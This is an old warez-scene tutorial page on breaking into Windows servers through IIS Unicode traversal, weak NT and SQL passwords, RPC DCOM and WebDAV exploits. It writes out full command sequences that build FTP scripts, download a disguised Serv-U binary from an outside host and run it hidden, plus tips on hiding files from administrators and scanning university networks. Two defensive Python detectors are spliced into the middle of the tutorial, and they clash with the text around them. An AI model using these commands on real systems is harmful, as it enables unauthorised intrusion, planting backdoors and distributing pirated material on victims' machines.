FXPSECRETS.TK: FXP tutorials

Contents:
- IIS Unicode pubstro hacking
- NT Pass pubstro hacking
- SQL pubstro hacking
- RPC Dcom pubstro hacking
- Webdav pubstro hacking
- IP range scanning
- Important files

---
IIS Unicode pubstro hacking

First, get the IP and unicode URL from your favorite FXP board or scan them yourself.

    1.2.3.4 :: IP
    Exploit : IIS
    Hostname : somefastserver.com
    Unicode : /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe :: unicode url
    Drive c space : 7 map(pen) 11.295.252.480 bytes available :: bytes available on disk
    Drive d space : 8 map(pen) 23.276.408.832 bytes available
    Drive e space : 4 map(pen) 0 bytes beschikbaar
    ASP exploit : No
    Firewall : No :: that's what we need to successfully put a stro on this server.

Now, install ServU on your own PC. Make a nice server and don't forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE, TLIST.EXE and KILL.EXE...

Make an account at web1000.com and upload the files WINMGNT.EXE, ServUDaemon.ini, TLIST.EXE and KILL.EXE from your local folder to your ftp account on web1000...

Now we are starting with Unicode URLs. In explorer, type

    http://"ip"/unicodeurl/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\line.exe

Wait till it tells you there was 1 file copied...
Again, in explorer, type

    http://"ip"/scripts/line.exe?/c+echo+open+(your web1000 dns entry)+>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+(your web1000 username)>>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+(your web1000 password)>>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+get+WINMGNT.EXE>>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+get+KILL.EXE>>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+get+TLIST.EXE>>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+get+ServUDaemon.ini>>+script.txt
    http://"ip"/scripts/line.exe?/c+echo+bye>>+script.txt

To verify these steps, type in explorer

    http://"ip"/scripts/line.exe?/c+type+script.txt

If it shows up like

    open bla.web1000.com
    bla_web1000_com
    wicked123
    get WINMGNT.EXE
    get KILL.EXE
    get TLIST.EXE
    get ServUDaemon.ini
    bye

then you'll be set.

Now, we need to transfer the files from our web1000 account to our IIS server. We will use the program FTP.EXE for this. Don't worry, it's already on the IIS server. The only thing we have to do is copy it to our directory on the IIS server. In explorer, type

    http://"ip"/scripts/line.exe?/c+copy+c:\winnt\system32\ftp.exe+ftp.exe

Now we can start transferring the files.

    http://"ip"/scripts/line.exe?/c+ftp.exe+-i+-s:script.txt

This will take a while, but it's absolutely necessary to let this complete totally. When the page has stopped loading, type in explorer

    http://"ip"/scripts/line.exe?/c+dir

Verify that the files WINMGNT.EXE, TLIST.EXE, KILL.EXE and ServUDaemon.ini are there, and that their filesizes are correct.

Now, let's fire up the server by typing in explorer

    http://"ip"/scripts/line.exe?/c+WINMGNT.EXE%20/h

Let the page load for 10 seconds, then close explorer. Check the FTP by logging in on the IP and port. If it works, congratulations! You hacked yourself a stro!

If it doesn't work, type

    http://"ip"/scripts/line.exe?/c+type+ServUStartuplog.txt

in explorer. This will give you clues for what the problem is...
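Every request in the procedure above ends up in the web server's access log, so the whole sequence is detectable after the fact. The following is an added example, not part of the original page: it decodes logged URLs repeatedly (the encoded `..%%35%63` form only becomes a traversal on the second decode pass) and flags the traversal, the copied shell and the FTP script staging. The log lines are constructed, the W3C field layout is an assumption, and the rule names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended format; addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-05-01 10:00:01 192.0.2.10 GET /default.htm - 200
2003-05-01 10:02:11 198.51.100.7 GET /_vti_bin/..%%35%63..%%35%63../winnt/system32/cmd.exe /c+copy+c:\\winnt\\system32\\cmd.exe+c:\\Inetpub\\scripts\\line.exe 200
2003-05-01 10:02:40 198.51.100.7 GET /scripts/line.exe /c+echo+get+WINMGNT.EXE>>+script.txt 200
2003-05-01 10:03:02 198.51.100.7 GET /scripts/line.exe /c+ftp.exe+-i+-s:script.txt 200
2003-05-01 10:04:00 192.0.2.10 GET /scripts/search.asp q=ftp+mirror 200
"""

def full_decode(value, rounds=5):
    """Percent-decode until stable, then normalise slashes and case."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/").lower()

# Hypothetical rule names; each rule sees the fully decoded stem and query.
RULES = {
    "dir-traversal": lambda stem, query: "../" in stem,
    "shell-via-web": lambda stem, query: stem.endswith(".exe") and query.startswith("/c "),
    "ftp-script-staging": lambda stem, query: "ftp.exe" in query and "-s:" in query,
    "script-file-write": lambda stem, query: re.search(r"\becho\b.*>", query) is not None,
}

def analyse(log_text):
    """Return {client_ip: sorted rule names} for requests matching any rule."""
    fields, hits = [], {}
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        stem = full_decode(rec.get("cs-uri-stem", ""))
        query = full_decode(rec.get("cs-uri-query", "").replace("+", " "))
        matched = {name for name, rule in RULES.items() if rule(stem, query)}
        if matched:
            hits.setdefault(rec["c-ip"], set()).update(matched)
    return {ip: sorted(rules) for ip, rules in hits.items()}

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```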
If the webserver comes up with something like "file does not exist", then the server is already hacked or you don't have execution rights on the server. Type

    http://"ip"/scripts/tlist.exe

to find out which processes are already running. If you see something like Servudaemon.exe or WINMGNT.EXE after you executed TLIST.EXE, just type

    http://"ip"/scripts/kill.exe?WINMGNT.EXE

or

    http://"ip"/scripts/kill.exe?Servudaemon.exe

and then try to start your own server again.

---
NT Pass pubstro hacking

Well, you know the drill, go to your FXP board and get a NT-Pass scan.

Now, install ServU on your own PC. Make a nice server and don't forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE...

In explorer, type:

    \\IP\c$

If a popup appears and asks you for the username and the password, then type the strings you got from the scan. After a few seconds you will see their C drive. Now make a dir somewhere (I recommend somewhere in the Windows folder so the sysop won't notice your work too fast) and upload WINMGNT.EXE and Servudaemon.ini to it.

Now it's time to fire up our ftp server. Open up a command prompt on your own PC and navigate to the folder where you stored psexec.exe, pslist.exe and pskill.exe. Type:

    psexec \\IP -d c:\path\to\files\winmgnt.exe

Congratulations! Your server is now up and running!

If your server is not up, try

    pslist \\IP

and look if another server is already running. If this is the case, use

    pskill \\IP (serverprocessname.exe)

and try starting up your own server again with the command

    psexec \\IP -d c:\path\to\files\winmgnt.exe

---
SQL pubstro hacking

First, get your ass down to your FXP board and search for a SQL scan.

Now, install ServU on your own PC. Make a nice server and don't forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE, TLIST.EXE and KILL.EXE...
Make an account at web1000.com and upload the files WINMGNT.EXE, ServUDaemon.ini, TLIST.EXE and KILL.EXE from your local folder to your ftp account on web1000...

Fire up SQLExec and fill out the host IP, username and password. Press connect. When you are connected you have to give the following commands.

    c echo open (your web1000 dns entry) > script.txt
    c echo (your web1000 username)>> script.txt
    c echo (your web1000 password)>> script.txt
    c echo get WINMGNT.EXE>> script.txt
    c echo get KILL.EXE>> script.txt
    c echo get TLIST.EXE>> script.txt
    c echo get ServUDaemon.ini>> script.txt
    c echo bye>> script.txt
    c copy c:\winnt\system32\ftp.exe ftp.exe
    c ftp.exe -i -s:script.txt
    c winmgnt.exe /h

If everything went ok, your FTP server is now done. If not, try to give the command

    c tlist.exe

to find out which other processes are already running. If you see something like Servudaemon.exe or WINMGNT.EXE after you executed TLIST.EXE, just give the command

    c kill.exe WINMGNT.EXE

or

    c kill.exe Servudaemon.exe

and then try to start your own server with the command

    c winmgnt.exe /h

---
RPC Dcom pubstro hacking

First of all, get your ass to a FXP board, and search for some fresh RPC Dcom Scanz.

Now, install ServU on your own PC. Make a nice server and don't forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE...

Make an account at web1000.com and upload the files WINMGNT.EXE and ServUDaemon.ini from your local folder to your ftp account on web1000...

Then, fire up the command prompt, navigate to the dcom directory and use the following command.

For a Windows 2000 target, type "dcom -d (host)"
For a Windows XP or 2003 target, type "dcom -d (host) -t 1"
(both without the quotes)

If everything is right, you should have a command prompt now on the remote computer. Now, the whole point is to get a FTP server here, right? Type the following in the prompt on the remote computer.
    echo open (your web1000 dns entry) > script.txt
    echo (your web1000 username)>> script.txt
    echo (your web1000 password)>> script.txt
    echo get WINMGNT.EXE>> script.txt
    echo get KILL.EXE>> script.txt
    echo get TLIST.EXE>> script.txt
    echo get ServUDaemon.ini>> script.txt
    echo bye>> script.txt
    ftp.exe -i -s:script.txt
    winmgnt.exe /h

Try now connecting to your server on the remote computer. If it doesn't work, then leave the remote PC alone, it's already hacked.

---
Webdav pubstro hacking

First of all, get your ass to a FXP board, and search for some fresh Webdav Scanz.

Now, install ServU on your own PC. Make a nice server and don't forget to register your ServU copy with a valid serial. Now, take the configuration file (ServUDaemon.ini) and copy it to a folder along with WINMGNT.EXE...

Make an account at web1000.com and upload the files WINMGNT.EXE and ServUDaemon.ini from your local folder to your ftp account on web1000...

Then, fire up the command prompt, navigate to the webdav3 directory and use the following command,

"webdav3 (host)" (without the quotes)

If everything is right, you should have a command prompt now on the remote computer. Now, the whole point is to get a FTP server here, right? Type the following in the prompt on the remote computer.

    echo open (your web1000 dns entry) > script.txt
    echo (your web1000 username)>> script.txt
    echo (your web1000 password)>> script.txt
    echo get WINMGNT.EXE>> script.txt
    echo get KILL.EXE>> script.txt
    echo get TLIST.EXE>> script.txt
    echo get ServUDaemon.ini>> script.txt
    echo bye>> script.txt
    ftp.exe -i -s:script.txt
    winmgnt.exe /h

Try now connecting to your server on the remote computer. If it doesn't work, then leave the remote PC alone, it's already hacked.

---
IP range scanning

Alright, if you want to scan, you only want to scan the fast ranges, because if you want to distribute warez, you want to distribute them as fast as possible. When you start scanning, the first thing you need to do is to find a fast range.
- Universities have fast internet connections. So take a look at this website: http://geowww.uibk.ac.at/univ/
  Here you will find all the universities over the whole world. Just pick a nice university and ping it to get the IP of the university. Now you have to whois the IP. You can whois IP addresses at the following sites:
  http://www.apnic.net/
  http://www.arin.net/
  http://www.ripe.net/
  Whois the IP and the website will come up with the range you will have to scan.

---
Important files

These are the files you need to start making str0's...

serverfiles.zip - You need these files to put a FTP server on a vulnerable server.
iishack.zip - Files used in a hack with a vulnerable IIS server.
nthack.zip - Files used in a hack with a server with a weak NT account.
sqlhack.zip - Files used in a hack with a server with a weak MSSQL account.
scanfiles.zip - Files used to scan vulnerable servers. (IIS, NT-Pass and SQL)
advancedfiles.zip - Files for the diehard FXP guy/gal. Only touch if you can successfully set up a ftp server on a vulnerable remote machine.

---EOF---
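The SQL, RPC Dcom and Webdav sections all end with the same host-side sequence: an FTP script is built line by line with echo redirects, run with `ftp.exe -i -s:`, and a fetched binary is then started. The following is an added example, not part of the original page, showing how that sequence can be correlated from process-creation command lines. The events, host names and rule names are constructed, and the record shape (host, command line) is an assumption about the telemetry available.

```python
import re

# Constructed process-creation records (host, command line), in time order.
EVENTS = [
    ("web01", r"cmd.exe /c echo open files.example.net > script.txt"),
    ("web01", r"cmd.exe /c echo someuser>> script.txt"),
    ("web01", r"cmd.exe /c echo get WINMGNT.EXE>> script.txt"),
    ("web01", r"cmd.exe /c echo bye>> script.txt"),
    ("web01", r"ftp.exe -i -s:script.txt"),
    ("web01", r"winmgnt.exe /h"),
    ("app02", r"ftp.exe -i -s:nightly_upload.txt"),
    ("app02", r"cmd.exe /c echo build finished >> build.log"),
]

ECHO = re.compile(r"\becho\s+(.*?)\s*>{1,2}\s*(\S+)\s*$", re.I)
FTP = re.compile(r"\bftp(?:\.exe)?\b.*?-s:(\S+)", re.I)

def detect(events):
    """Correlate echo-built FTP scripts, their execution, and fetched binaries."""
    scripts, watched, alerts = {}, {}, []
    for host, cmdline in events:
        if not cmdline.strip():
            continue
        echo = ECHO.search(cmdline)
        if echo:  # remember each line written to a file via echo redirect
            scripts.setdefault((host, echo.group(2).lower()), []).append(echo.group(1))
            continue
        ftp = FTP.search(cmdline)
        if ftp:  # alert only if the script was built on the command line
            lines = scripts.get((host, ftp.group(1).lower()), [])
            if any(ln.lower().startswith("open ") for ln in lines):
                alerts.append((host, "ftp-script-staged", ftp.group(1)))
                gets = {ln.split()[1].lower() for ln in lines
                        if ln.lower().startswith("get ") and len(ln.split()) > 1}
                watched.setdefault(host, set()).update(gets)
            continue
        # image name of the started process, without its directory
        image = cmdline.split()[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
        if image in watched.get(host, ()):
            alerts.append((host, "fetched-binary-executed", image))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```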